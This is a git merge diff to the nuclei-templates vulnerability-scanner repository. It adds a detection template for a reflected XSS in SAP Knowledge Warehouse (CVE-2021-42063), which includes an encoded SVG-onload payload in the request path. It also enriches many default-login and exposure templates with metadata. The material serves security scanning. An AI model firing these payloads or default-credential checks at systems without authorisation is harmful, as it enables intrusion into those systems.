Merge branch 'projectdiscovery:master' into master
commit
03d2c4a152
|
@ -9,6 +9,7 @@ on:
|
|||
jobs:
|
||||
templates:
|
||||
runs-on: ubuntu-latest
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
with:
|
||||
|
|
|
@ -2,8 +2,8 @@ name: 📑 Template-DB Indexer
|
|||
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- '*'
|
||||
branches:
|
||||
- master
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
|
|
|
@ -2,6 +2,7 @@ cnvd/2021/CNVD-2021-14536.yaml
|
|||
cves/2020/CVE-2020-17456.yaml
|
||||
cves/2020/CVE-2020-27467.yaml
|
||||
cves/2021/CVE-2021-41691.yaml
|
||||
cves/2021/CVE-2021-42063.yaml
|
||||
cves/2022/CVE-2022-0437.yaml
|
||||
exposed-panels/beyondtrust-login-server.yaml
|
||||
exposed-panels/beyondtrust-panel.yaml
|
||||
|
|
|
@ -0,0 +1,46 @@
|
|||
id: CVE-2021-42063
|
||||
|
||||
info:
|
||||
name: SAP Knowledge Warehouse (KW) - Reflected XSS
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: |
|
||||
A security vulnerability has been discovered in the SAP Knowledge Warehouse - versions 7.30, 7.31, 7.40, 7.50. The usage of one SAP KW component within a Web browser enables unauthorized attackers to conduct XSS attacks, which might lead to disclose sensitive data.
|
||||
reference:
|
||||
- https://seclists.org/fulldisclosure/2022/Mar/32
|
||||
- https://packetstormsecurity.com/files/166369/SAP-Knowledge-Warehouse-7.50-7.40-7.31-7.30-Cross-Site-Scripting.html
|
||||
- https://twitter.com/MrTuxracer/status/1505934549217382409
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-42063
|
||||
metadata:
|
||||
shodan-query:
|
||||
- 'SAP NetWeaver Application Server'
|
||||
- 'http.component:"SAP"'
|
||||
tags: cve,cve2021,sap,xss
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-42063
|
||||
cwe-id: CWE-79
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<SVG ONLOAD=alert(document.domain)>"
|
||||
- "SAPIKS2"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -3,8 +3,16 @@ id: canal-default-login
|
|||
info:
|
||||
name: Alibaba Canal Default Login
|
||||
author: pdteam
|
||||
description: An Alibaba Canal default login was discovered.
|
||||
severity: high
|
||||
tags: alibaba,default-login
|
||||
reference:
|
||||
- https://github.com/alibaba/canal/wiki/ClientAdapter
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
cve-id:
|
||||
cwe-id: CWE-522
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -33,3 +41,5 @@ requests:
|
|||
words:
|
||||
- 'data":{"token"'
|
||||
- '"code":20000'
|
||||
|
||||
# Enhanced by mp on 2022/03/22
|
||||
|
|
|
@ -4,8 +4,15 @@ info:
|
|||
name: AlphaWeb XE Default Login
|
||||
author: Lark Lab
|
||||
severity: medium
|
||||
description: An AlphaWeb XE default login was discovered.
|
||||
tags: default-login
|
||||
reference: https://wiki.zenitel.com/wiki/AlphaWeb
|
||||
reference:
|
||||
- https://wiki.zenitel.com/wiki/AlphaWeb
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
|
||||
cvss-score: 5.8
|
||||
cve-id:
|
||||
cwe-id: CWE-522
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -33,3 +40,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/22
|
||||
|
|
|
@ -3,8 +3,16 @@ id: ambari-default-login
|
|||
info:
|
||||
name: Apache Ambari Default Login
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: An Apache Ambari default admin login was discovered.
|
||||
severity: high
|
||||
tags: ambari,default-login,apache
|
||||
reference:
|
||||
- https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
cve-id:
|
||||
cwe-id: CWE-522
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -24,3 +32,5 @@ requests:
|
|||
- '"Users" : {'
|
||||
- 'AMBARI.'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/03/22
|
||||
|
|
|
@ -3,11 +3,18 @@ id: airflow-default-login
|
|||
info:
|
||||
name: Apache Airflow Default Login
|
||||
author: pdteam
|
||||
severity: critical
|
||||
severity: high
|
||||
tags: airflow,default-login,apache
|
||||
reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html
|
||||
description: An Apache Airflow default login was discovered.
|
||||
reference:
|
||||
- https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html
|
||||
metadata:
|
||||
shodan-query: title:"Sign In - Airflow"
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
cve-id:
|
||||
cwe-id: CWE-522
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -54,3 +61,5 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- 'You should be redirected automatically to target URL: <a href="/">'
|
||||
|
||||
# Enhanced by mp on 2022/03/22
|
||||
|
|
|
@ -1,14 +1,22 @@
|
|||
id: apisix-default-login
|
||||
|
||||
info:
|
||||
name: Apache Apisix Default Login
|
||||
name: Apache Apisix Default Admin Login
|
||||
author: pdteam
|
||||
severity: critical
|
||||
severity: high
|
||||
tags: apisix,apache,default-login
|
||||
description: An Apache Apisix default admin login was discovered.
|
||||
metadata:
|
||||
shodan-query: title:"Apache APISIX Dashboard"
|
||||
fofa-query: title="Apache APISIX Dashboard"
|
||||
product: https://apisix.apache.org
|
||||
reference:
|
||||
- https://apisix.apache.org/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
cve-id:
|
||||
cwe-id: CWE-522
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -40,3 +48,5 @@ requests:
|
|||
- '"token"'
|
||||
- '"code":0'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/03/22
|
||||
|
|
|
@ -4,10 +4,17 @@ info:
|
|||
name: Apollo Default Login
|
||||
author: PaperPen
|
||||
severity: high
|
||||
description: An Apollo default login was discovered.
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:11794165
|
||||
reference: https://github.com/apolloconfig/apollo
|
||||
reference:
|
||||
- https://github.com/apolloconfig/apollo
|
||||
tags: apollo,default-login
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
cve-id:
|
||||
cwe-id: CWE-522
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -47,3 +54,5 @@ requests:
|
|||
- "status_code_1 == 302 && status_code_2 == 200"
|
||||
- "contains(tolower(all_headers_2), 'application/json')"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/03/22
|
||||
|
|
|
@ -1,10 +1,16 @@
|
|||
id: arl-default-login
|
||||
|
||||
info:
|
||||
name: ARL Default Login
|
||||
name: ARL Default Admin Login
|
||||
author: pikpikcu
|
||||
description: An ARL default admin login was discovered.
|
||||
severity: high
|
||||
tags: arl,default-login
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
cve-id:
|
||||
cwe-id: CWE-522
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -35,3 +41,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/22
|
||||
|
|
|
@ -1,11 +1,19 @@
|
|||
id: digitalrebar-default-login
|
||||
|
||||
info:
|
||||
name: RackN Digital Rebar provision default login
|
||||
name: RackN Digital Rebar Default Login
|
||||
author: c-sh0
|
||||
severity: high
|
||||
reference: https://docs.rackn.io/en/latest/doc/faq-troubleshooting.html?#what-are-the-default-passwords
|
||||
description: A RackN Digital Rebar default login was discovered.
|
||||
reference:
|
||||
- https://docs.rackn.io/en/latest/doc/faq-troubleshooting.html?#what-are-the-default-passwords
|
||||
- https://rackn.com/
|
||||
tags: rackn,digitalrebar,default-login
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
cve-id:
|
||||
cwe-id: CWE-522
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -38,3 +46,5 @@ requests:
|
|||
- 'Name'
|
||||
- 'Secret'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/03/22
|
||||
|
|
|
@ -1,12 +1,20 @@
|
|||
id: mantisbt-default-credential
|
||||
|
||||
info:
|
||||
name: MantisBT Default Credential
|
||||
name: MantisBT Default Admin Login
|
||||
author: For3stCo1d
|
||||
severity: high
|
||||
description: A MantisBT default admin login was discovered.
|
||||
reference:
|
||||
- https://mantisbt.org/
|
||||
metadata:
|
||||
shodan-query: title:"MantisBT"
|
||||
tags: mantisbt,default-login
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
cve-id:
|
||||
cwe-id: CWE-522
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -35,3 +43,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 302
|
||||
|
||||
# Enhanced by mp on 2022/03/22
|
||||
|
|
|
@ -4,10 +4,17 @@ info:
|
|||
name: StackStorm Default Login
|
||||
author: PaperPen
|
||||
severity: high
|
||||
description: A StackStorm default admin login was discovered.
|
||||
metadata:
|
||||
fofa-query: app="stackstorm"
|
||||
reference: https://github.com/StackStorm/st2-docker
|
||||
reference:
|
||||
- https://github.com/StackStorm/st2-docker
|
||||
tags: stackstorm,default-login
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
cve-id:
|
||||
cwe-id: CWE-522
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -36,3 +43,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 201
|
||||
|
||||
# Enhanced by mp on 2022/03/22
|
||||
|
|
|
@ -1,11 +1,18 @@
|
|||
id: caa-fingerprint
|
||||
|
||||
info:
|
||||
name: CAA Fingerprint
|
||||
name: CAA Record
|
||||
author: pdteam
|
||||
description: A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.
|
||||
severity: info
|
||||
reference: https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record
|
||||
reference:
|
||||
- https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record
|
||||
tags: dns,caa
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cve-id:
|
||||
cwe-id: CWE-200
|
||||
|
||||
dns:
|
||||
- name: "{{FQDN}}"
|
||||
|
@ -23,3 +30,5 @@ dns:
|
|||
- 'issue "(.*)"'
|
||||
- 'issuewild "(.*)"'
|
||||
- 'iodef "(.*)"'
|
||||
|
||||
# Enhanced by mp on 2022/03/22
|
||||
|
|
|
@ -4,7 +4,15 @@ info:
|
|||
name: ActiveAdmin Admin Dasboard Exposure
|
||||
author: pdteam
|
||||
severity: info
|
||||
description: An ActiveAdmin Admin dashboard was discovered.
|
||||
tags: panel,activeadmin
|
||||
reference:
|
||||
- https://activeadmin.info/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cve-id:
|
||||
cwe-id: CWE-200
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -16,3 +24,5 @@ requests:
|
|||
- "active_admin_content"
|
||||
- "active_admin-"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/03/22
|
||||
|
|
|
@ -4,7 +4,15 @@ info:
|
|||
name: Apache ActiveMQ Exposure
|
||||
author: pdteam
|
||||
severity: info
|
||||
description: An Apache ActiveMQ implementation was discovered.
|
||||
reference:
|
||||
- https://activemq.apache.org/
|
||||
tags: panel,activemq,apache
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cve-id:
|
||||
cwe-id: CWE-200
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -17,3 +25,5 @@ requests:
|
|||
- '<h2>Welcome to the Apache ActiveMQ!</h2>'
|
||||
- '<title>Apache ActiveMQ</title>'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/03/22
|
||||
|
|
Loading…
Reference in New Issue